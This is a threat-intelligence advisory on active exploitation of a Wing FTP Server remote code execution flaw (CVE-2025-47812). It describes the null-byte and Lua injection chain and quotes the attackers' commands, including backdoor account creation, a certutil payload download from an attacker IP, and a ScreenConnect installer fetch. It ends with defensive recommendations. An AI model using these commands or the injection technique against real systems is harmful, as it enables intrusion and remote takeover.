From Null to Shell: Exploitation of Wing FTP Server Vulnerability in the Wild

Published Date: July 15, 2025
Category: ShadowOpsIntel
Share:

On July 1, 2025, Huntress observed active exploitation of a critical remote code execution vulnerability affecting Wing FTP Server. This vulnerability was publicly disclosed on June 30, 2025 by security researcher Julien Ahrens, and began seeing in-the-wild exploitation almost immediately. The flaw impacts multiple platforms including Windows, Linux, and macOS, and allows unauthenticated attackers to achieve SYSTEM-level remote code execution via null-byte and Lua injection through crafted login requests.

Severity Level: Critical

Vulnerability Details

  • CVE ID: CVE-2025-47812
  • Vulnerability Type: Remote Code Execution (RCE)
  • CVSS Score: 10.0
  • Affected Functionality: loginok.html authentication process
  • Affected Products: Wing FTP Server versions before 7.4.4

Exploitation Chain: CVE-2025-47812

  1. Authentication Bypass via Null Byte
    • The attacker sends a login request where the username contains a null byte (%00), followed by injected Lua code.
    • Due to how strlen() works in C++, the validation only checks up to the null byte.
    • Example username: anonymous%00]]–
  2. Session File Manipulation
    • The session ID is assigned via the UID cookie.
    • Raw username (including injected code) is stored in _SESSION.
    • Lua code is stored in session directory as .lua file.
  3. Code Execution Trigger
    • Accessing a page like dir.html causes the server to deserialize and execute the Lua session file.
    • This results in remote code execution (RCE) with root/SYSTEM privileges depending on OS.

Observed Attack Details

  1. Recon and Enumeration
    After exploiting CVE-2025-47812, attackers conducted local reconnaissance to validate access and assess the system environment. Key actions included:
    • User discovery: whoami, net user, net user /all, whoami /priv
    • Network insight: ipconfig, arp -a, nslookup
    • Tool probing: curl, curl -help, attempted powershell execution
    These commands reflect typical post-exploitation reconnaissance to identify user privileges, assess connectivity, and prepare for persistence or data exfiltration.
  2. Persistence Attempts
    Attacker created local user accounts for persistence:
    • net user wingftp 123123qweqwe /add
    • net user wing 123123qweqweqwe /add
  3. Execution of Payloads
    • Malicious payload downloaded via: certutil -urlcache -f http://185.196.9[.]225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe
    • Malformed curl commands and batch files were also observed but mostly failed due to syntax issues or Defender blocking.
    • Attempted ScreenConnect install: curl -o c:\1.msi https://oooooooo11.screenconnect[.]com/bin/screenconnect.clientsetup.msi

Recommendations

  1. Immediately upgrade Wing FTP Server to version 7.4.4 or later. Older versions are vulnerable to RCE via Lua injection.
  2. If not required, disable anonymous login in Wing FTP configuration.
  3. Restrict access to Wing FTP ports via firewall rules to only trusted IP ranges.
  4. Look for unauthorized users like wing, wingftp. Disable/delete them.
  5. Block weak passwords like 123123qweqwe using GPOs or identity policy enforcement.
  6. Look for anomalous .lua files in C:\Program Files (x86)\Wing FTP Server\session\
  7. Monitor for suspicious child processes (cmd.exe / powershell.exe) spawned from WFTPServer.exe
  8. In cases where upgrading to a secure version is not feasible, it is advised restricting or disabling HTTP/HTTPS access to the Wing FTP web interface, turning off anonymous login functionality, and closely monitoring the session directory for any unusual or unauthorized file activity.
  9. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/bff76c5cb45ffa975eeda7e6b011fe5ed4b0f304463c19d160cb6551c7992c57/iocs

Source:

  • https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/
  • https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
  • https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

 Talk to an expert